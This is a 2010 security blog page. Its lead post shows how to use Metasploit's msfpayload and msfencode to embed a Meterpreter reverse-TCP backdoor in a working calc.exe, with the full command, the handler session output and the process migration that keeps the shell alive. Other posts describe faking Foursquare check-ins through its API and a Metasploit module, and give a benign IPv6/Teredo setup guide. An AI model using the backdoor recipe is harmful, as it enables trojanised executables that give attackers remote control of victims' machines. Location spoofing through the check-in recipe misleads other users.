Wednesday, March 24, 2010

Msfencode a Msfpayload Into An Existing Executable


Very cool update to metasploit today:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.

let's see the new msfencode options:

~/trunk$ ./msfencode -h

Usage: ./msfencode


OPTIONS:


-a The architecture to encode as

-b The list of characters to avoid: '\x00\xff'

-c The number of times to encode the data

-e The encoder to use

-h Help banner

-i Encode the contents of the supplied file path

-k Keep template working; run payload in new thread (use with -x)

-l List available encoders

-m Specifies an additional module search path

-n Dump encoder information

-o The output file

-p The platform to encode for

-s The maximum size of the encoded data

-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)

-x Specify an alternate win32 executable template


Let's make our new backdoored executable.

~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)


Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.210.11

LHOST => 192.168.210.11

msf exploit(handler) > exploit


[*] Started reverse handler on 192.168.210.11:4444

[*] Starting the payload handler...

[*] Sending stage (748032 bytes)

[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)



Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > run migrate explorer.exe

[*] Current server process: calc_backdoor.exe (3360)

[*] Migrating to explorer.exe...

[*] Migrating into process ID 1592

[*] New server process: Explorer.EXE (1592)

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getpid

Current pid: 1592

meterpreter >
CG

Saturday, March 20, 2010

Working on a new tool


To the readers of this blog,

This blog has been inactive for about a month but it has nothing to do w/ a standstill on my part. I will post something useful relatively soon but please know I am co-authoring another AppSec specific tool and this takes up the majority of my time.

Hopefully when the software (open source) is released it won't disapoint :-)

Cheers,

~cktricky
cktricky

Friday, March 19, 2010

F**king With Foursquare Goes MSF Style


mindless foursquare fun goes metasploit style...

msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info



Name: Foursquare Location Poster

Version: $Revision:$

License: Metasploit Framework License (BSD)

Rank: Normal



Provided by:

CG



Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD password yes foursquare password

Proxies no Use a proxy chain

RHOST api.foursquare.com yes The target address

RPORT 80 yes The target port

USERNAME username yes foursquare username

VENUEID 185675 yes foursquare venueid

VHOST no HTTP server virtual host



Description:

Fuck with Foursquare, be anywhere you want to be by venue id



References:

http://groups.google.com/group/foursquare-api

http://www.mikekey.com/im-a-foursquare-cheater/


msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com

USERNAME =>
notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword

PASSWORD =>
notmypassword
msf auxiliary(foursquare) > set VENUEID 9186

VENUEID => 9186


msf auxiliary(foursquare) > run

[*] HTTP/1.1 200 OK

Content-Type: text/xml; charset=utf-8

Date: Fri, 19 Mar 2010 13:59:28 GMT

Content-Length: 1311

Server: nginx/0.7.64

Connection: keep-alive



Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP

[*] Auxiliary module execution completed


You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
CG

Thursday, March 18, 2010

Getting Started With IPv6


Getting IPv6 up and running

Install the miredo package:
$ sudo apt-get install miredo

After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.

Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove

Usage:

$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}

If miredo is running you should have another interface called "teredo".
You can display it with the following command:

$ ifconfig teredo

To test if you can reach the IPv6 network, try the following:
carnal0wnage ~: ping6 ipv6.google.com PING ipv6.google.com(iw-in-x63.1e100.net) 56 data bytes 64 bytes from iw-in-x63.1e100.net: icmp_seq=1 ttl=55 time=284 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=4 ttl=55 time=100 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=5 ttl=55 time=108 ms --- ipv6.google.com ping statistics --- 7 packets transmitted, 3 received, 57% packet loss, time 6000ms rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 m

carnal0wnage ~: ping6 www.ipv6.org PING www.ipv6.org(igloo.stacken.kth.se) 56 data bytes 64 bytes from igloo.stacken.kth.se: icmp_seq=1 ttl=58 time=472 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=2 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=3 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=5 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=6 ttl=58 time=156 ms --- www.ipv6.org ping statistics --- 7 packets transmitted, 5 received, 28% packet loss, time 6000ms rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms


carnal0wnage ~: traceroute6 www.ipv6.org traceroute to www.ipv6.org (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets 1 * * * 2 terminator.csbnet.se (2a02:9a0:0:1::193) 612.035 ms 612.035 ms 612.035 ms 3 c2sth-ge-5-0-8.sunet.se (2001:6b0:dead:beef:2::3a9) 648.037 ms 648.037 ms 648.037 ms 4 a1sth-kth.sunet.se (2001:6b0:dead:beef:2::2c6) 636.036 ms 636.036 ms 636.036 ms 5 2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2) 736.042 ms 736.042 ms * 6 * 2001:6b0:1:1200::3 (2001:6b0:1:1200::3) 324.018 ms 324.018 ms 7 igloo.stacken.kth.se (2001:6b0:1:ea:202:a5ff:fecd:13a6) 160.009 ms 156.009 ms 156.009 ms

Changing teredo server:

sudo vi /etc/miredo.conf ServerAddress teredo.ipv6.microsoft.com sudo /etc/init.d/miredo restart


Windows XP

Install
Open the Terminal with Start -> Run -> cmd

netsh interface ipv6 install netsh interface ipv6 set teredo client

Uninstall

netsh interface ipv6 uninstall

Vista

Install
IPV6 and Teredo is enabled per default. You can get into the settings by going into the preferences for an network interface. "Obtain an IPv6 address automatically" should do the trick.

Uninstall
Add this registry value ("DWORD") set to 0xFF (long line, double-click, and copy):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\DisabledComponents

Or save the two lines in a .reg file and double-click it:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters] "DisabledComponents"=dword:000000ff

You can also go to the interface properties of an network interface and deselect the IPv6 protocol for that interface. To enable IPv6 again, replace dword:000000ff above with dword:00000000.


Ref:
http://pugio.net/2007/07/howto-enable-ipv6-the-teredo-w.html
https://blueimp.net/linux/howto/ipv6-teredo.html
CG

Monday, March 15, 2010

F**king with Foursquare


Foursquare is pretty neat. You can post you location via phone or browser and get nifty badges for different things or become a mayor of a place if you check in to that location the most. Its also exceedingly easy to cheat at.

I only casually mentioned the idea of cheating to @Jack_Mannino and within a few minutes of emailing him the link to the API he was already traveling the globe at record speed.

Foursquare even has a nifty and pretty easy to understand API here:
http://groups.google.com/group/foursquare-api/web/api-documentation

The simplest thing you can do is checkin and post your location by vid or venue.

URL: http://api.foursquare.com/v1/checkin
Formats: XML, JSON
HTTP Method(s): POST
Requires Authentication: Yes
Parameters:
  • vid - (optional, not necessary if you are 'shouting' or have a venue name). ID of the venue where you want to check-in
  • venue - (optional, not necessary if you are 'shouting' or have a vid) if you don't have a venue ID or would rather prefer a 'venueless' checkin, pass the venue name as a string using this parameter. it will become an 'orphan' (no address or venueid but with geolat, geolong)
  • shout - (optional) a message about your check-in. the maximum length of this field is 140 characters
  • private - (optional). "1" means "don't show your friends". "0" means "show everyone"
  • twitter - (optional, defaults to the user's setting). "1" means "send to Twitter". "0" means "don't send to Twitter"
  • facebook - (optional, defaults to the user's setting). "1" means "send to Facebook". "0" means "don't send to Facebook"
  • geolat - (optional, but recommended)
  • geolong - (optional, but recommended)

So a sample request would look like:

POST /v1/checkin?vid= HTTP/1.1
Authorization: Basic
Host: api.foursquare.com
Proxy-Connection: Keep-Alive

Content-Length:


twitter=1&facebook=0


It being a POST you'll have to write some code to handle the Content-Length or use Burp Repeater or Metasploit.

Have fun traveling the globe from your living room.


CG